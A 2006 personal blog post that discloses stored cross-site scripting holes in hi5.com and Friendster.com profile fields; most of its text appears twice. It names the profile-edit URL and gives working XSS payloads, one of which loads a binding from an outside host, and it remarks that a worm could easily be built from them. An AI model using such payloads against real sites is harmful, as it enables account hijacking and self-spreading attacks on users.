Digger's blog
Thursday, July 06, 2006
hi5.com and friendster.com vulnerable to cross site scripting
Well, it only took me 10 minutes for hi5.com and 5 minutes for Friendster.com to find cross site scripting vulnerabilities.
Rememeber the myspace worm (samy is my hero)?
Both of these websites are in the same situation and a worm can be easily created using these vulnerabilities. It's very interesting how they manage to go online without doing some basic security testing.
Some details about the vulnerabilities:
For hi5.com,
If you have an account, when you edit your profile at
http://hi5.com/friend/account/editProfileLifestyle.do
You can enter the payload in the About me section (for example).
I found one XSS for Internet Explorer and one for Firefox and combine them:P
For Friendster.com,
Just edit your profile and a simple <body onload="alert(1);"> does the job just fine.
Here is a sample profile:
If you want to know more about XSS, the best resource is RSnake's page.
Rememeber the myspace worm (samy is my hero)?
Both of these websites are in the same situation and a worm can be easily created using these vulnerabilities. It's very interesting how they manage to go online without doing some basic security testing.
Some details about the vulnerabilities:
For hi5.com,
If you have an account, when you edit your profile at
http://hi5.com/friend/account/editProfileLifestyle.do
You can enter the payload in the About me section (for example).
<span style ="font: Comic Sans MS; font-size: 20px; color:red">whatever</span><span style ="font: Comic Sans MS; font-size: 20px; color:blue; xss:expression(alert('XSS-IE')) ">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
</span>
I found one XSS for Internet Explorer and one for Firefox and combine them:P
For Friendster.com,
Just edit your profile and a simple <body onload="alert(1);"> does the job just fine.
Here is a sample profile:
If you want to know more about XSS, the best resource is RSnake's page.
posted by Digger # 11:02 AM 
Archives
